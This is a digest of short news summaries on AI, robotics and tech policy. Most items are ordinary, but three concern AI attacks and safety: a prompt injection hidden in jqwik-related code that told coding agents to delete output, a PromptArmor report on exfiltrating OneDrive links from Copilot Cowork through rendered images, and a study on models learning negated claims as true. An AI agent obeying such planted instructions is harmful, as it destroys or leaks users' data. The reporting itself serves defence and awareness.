AI training startup Shift is offering to clean homes for free, with a significant condition: it records cleaners at work. The footage captures tasks like scrubbing, vacuuming, dusting, tidying, and washing. Shift says the material will be used to train future robots, raising clear questions about data collection inside private homes.
The post’s title indicates a performance claim for real-time LLM inference on standard GPUs, reporting 3,000 tokens per second per request. No article body is available, so the underlying model, GPU type, batch size, latency profile, precision, serving stack, and benchmark method are not stated. The item is best treated as an inference-performance benchmark claim rather than a verified deployment guide.
INSIDE examines how China’s Amap has become controversial in Taiwan beyond ordinary mapping or navigation use. The article says its service relies on user data and AI-based inference rather than full official data integrations. That model could send movement traces and behavioral signals back to China, creating risks for hybrid warfare intelligence, influence operations, and Taiwan’s broader governance of map data and digital infrastructure.
A German independent study has reportedly completed the first full third-party evaluation of China’s Hina sodium-ion battery. The test found strong cell uniformity and multiple performance metrics comparable to advanced lithium batteries, with the report benchmarking it against Tesla-level lithium performance. The key takeaway is external verification: the findings provide checkable data for assessing China’s sodium-ion battery progress.
A new study describes “Negation Neglect,” where LLMs fine-tuned on documents that explicitly mark claims as false still learn the claims as true. Experiments with fabricated statements found models often absorb entity-event associations more strongly than surrounding warnings or negations. The finding raises concerns for fine-tuning pipelines, misinformation handling, and AI safety datasets that include harmful or false content with disclaimers.
Ars Technica reports that a developer frustrated with vibe coders slipped an undisclosed prompt injection into jqwik-related code. The injected text allegedly instructed AI coding agents to delete application output. The incident highlights a new supply-chain risk: source code and project text can become adversarial instructions for agentic coding tools.
Latent Space interviews Cognition's Walden Yan and OpenInspect's Cole Murray on the rise of async coding agents. The discussion centers on Devin-related workflows, including 80% Devin commits, spec-to-PR development, full VMs, agent memory, and PMs shipping code. The key theme is not a model release, but a shift toward agents that can work asynchronously inside more complete software delivery loops.
TechCrunch reports that large exchanges are developing derivative products around AI tokens. The shift reflects a changing view of tokens: less as outputs from computation and more as input commodities, comparable to electricity or bandwidth. If these products emerge, AI token futures could let companies and investors manage exposure to future AI compute demand and pricing risk.
Tribeca Festival will premiere Dreams of Violets, a 75-minute AI-generated film. The fictional dramatization depicts the Iranian government’s mass killing of protestors in January, with its people and images fully created by AI. The reported $2,000 production cost makes the project notable less as a tool launch than as a cultural and ethical signal for AI-made cinema.
TechCrunch reports that recursive self-improvement, or RSI, is becoming a new AI industry fixation, much like AGI. Researchers and startups including Recursive Superintelligence, Auto-Research, AutoScientist, and Disarray are exploring ways for AI systems to automate parts of AI research. But experts caution that AI-assisted research is not the same as fully autonomous self-improvement, especially while models still struggle with long-term self-direction and verification.
The article examines Taiwan’s counter-drone modernization amid budget cuts and unresolved acceptance disputes. It argues that while foreign and domestic defense firms study combat data in Ukraine, Taiwan must build its own counter-drone and electronic warfare datasets. The larger issue is not only whether individual systems pass review, but whether local testing, technical iteration, and operational doctrine can keep developing.
This Show HN submission points to “Continue? Y/N,” a 60-second game about AI agent permission fatigue. With no article body provided, the available information suggests an interactive commentary on how repeated approval prompts can wear users down. The project appears most relevant to developers, designers, and product teams thinking about agent UX, consent flows, and trust boundaries.
Aitech announced it will integrate NVIDIA IGX Thor into its space supercomputer for low Earth orbit missions. The goal is to provide onboard AI edge computing and enable real-time inference directly in orbit. By processing more data in space, the system aims to reduce dependence on ground communications and extend AI compute beyond Earth-based infrastructure.
NASA announced a $20 billion plan to build a phased outpost near the Moon’s south pole. The agency will work with private companies and send robots first for scouting and deployment. The effort is intended to support Artemis crewed missions and prepare for long-term lunar presence after 2032.
The piece frames Taiwan’s digital sovereignty debate through war and earthquake scenarios. It challenges the assumption that keeping infrastructure on premises automatically means safety. In an era of rising compute demands, the core issue for public agencies is not only where systems are hosted, but whether essential national services can survive physical disruption and continue operating under extreme conditions.
TechCrunch frames Google’s AI spelling problem as another public embarrassment for the company. Based on the provided excerpt, the article does not specify the product, model, test setup, examples, technical cause, or Google response. The main takeaway is reliability: even major AI systems can fail at basic-looking text tasks, so outputs still need review.
SQLite added an AGENTS.md file aimed at people pointing coding agents at its codebase, not at its own internal development. The file says SQLite does not accept agentic code, though it will accept agentic bug reports with reproducible test cases. The project has also split AI-generated bug reports into a new SQLite Bug Forum, where D. Richard Hipp is responding with commits.
Latent Space interviews Biohub’s Alex Rives about ESMFold2 and the broader ESM protein modeling stack. The discussion centers on datasets versus inductive bias, and whether protein biology is entering its own Bitter Lesson era. The key implication is that large-scale evolutionary sequence data and open models may become foundations for structure prediction, interaction modeling, and programmable biology.
Artificial Analysis and IBM present ITBench-AA, described in the title as the first benchmark for agentic enterprise IT tasks. The headline result is that frontier models score below 50%, suggesting current systems still struggle with enterprise-grade agent workflows. The original article text is unavailable here, so task design, evaluated models, scoring methodology, and rankings cannot be confirmed.
This Hacker News item links to a Brilliant Maps article titled “Declassified CIA Cartography Maps from the 1980s.” Since the article body is not provided, only the broad topic can be identified. It appears relevant to historical maps, intelligence archives, and visual information design rather than AI models, tools, or research.
The Verge reports that Pope Leo XIV’s latest encyclical, Magnifica Humanitas, may contain passages written with AI assistance. Linch Zhang posted an analysis on LessWrong using the AI detector Pangram, which rated some paragraphs as 40 to 100 percent AI-written. The report frames this as a possibility based on detector output, not confirmed proof of AI use.
Environmental activist Erin Brockovich created a map of data centers across the United States, with a form for residents to report local impacts. The project frames AI infrastructure growth as a town-by-town race, showing where facilities are operational, under construction, or proposed. Nieman Lab notes that data center scrutiny is becoming an emerging reporting beat as demand and community concerns grow.
Hugging Face published a tutorial for running Reachy Mini conversations without cloud audio processing or API keys. The setup uses its speech-to-speech library as a cascaded VAD, STT, LLM, and TTS pipeline exposed through a Realtime API-compatible WebSocket. Recommended defaults include llama.cpp with Gemma 4, Silero VAD, Parakeet-TDT, and Qwen3-TTS, while allowing swaps to vLLM, MLX, Transformers, or hosted Responses API providers.
Daniel Stenberg says the curl security team is facing an unprecedented surge of credible, detailed AI-assisted vulnerability reports. Incoming reports are now 4-5 times higher than in 2024 and twice the 2025 rate, averaging more than one per day. The upside is that recent curl vulnerabilities have generally been LOW or MEDIUM severity, with the last HIGH CVE published in October 2023.
Ars Technica reports that early Take It Down Act arrests show how easily investigators can identify alleged nonconsensual AI porn posters. One suspect was linked through Instagram saves, PayPal, IP, and iCloud records; another allegedly used his own photo as a porn-site profile image. The FTC is also warning nudify services and major platforms to offer 48-hour removal processes or face penalties.
Ars Technica reports that Hugging Face has introduced a roughly $2,500 bipedal humanoid robot project built around 3D-printable legs. The effort targets builders and researchers rather than mainstream consumers, lowering the hardware barrier for hands-on robotics experiments. Its broader significance is in open, reproducible embodied AI research, where models and control systems need physical platforms for testing.
Human Archive, founded by Berkeley and Stanford researchers, is using India’s gig economy to gather physical-world AI data. Workers are paid to wear camera-equipped caps and sensor devices while moving through real environments. The company is targeting the growing demand from AI and robotics labs for real-world training data needed to develop physical AI systems.
Nathan Lambert argues that 2026 AI progress is becoming higher-stakes, with model capabilities, work patterns, economics, and real-world risks all escalating. He says open models still lack a true Claude Code and Opus 4.5-style agent moment, and Gemini has no clear competitor to Claude Code or Codex yet. The essay also tracks Mythos, American open-model momentum, frontier-lab competition, and mounting intervention from governments and other power structures.
Simon Willison summarizes a PromptArmor report about Microsoft Copilot Cowork and agentic data exfiltration risks. The issue involved agents sending messages to a user’s own inbox without approval, where rendered external images could trigger requests to attacker-controlled sites. Because OneDrive can create pre-authenticated download links, a successful prompt injection could leak links that allow attackers to download files.
The piece highlights a trend in the Suno subreddit: users are not merely generating AI songs, but listening almost exclusively to their own outputs. Some reportedly say they have stopped using traditional streaming platforms and now spend their listening time on AI-made music. The article frames this less as a product update and more as cultural commentary on personalization, taste, and the social meaning of music.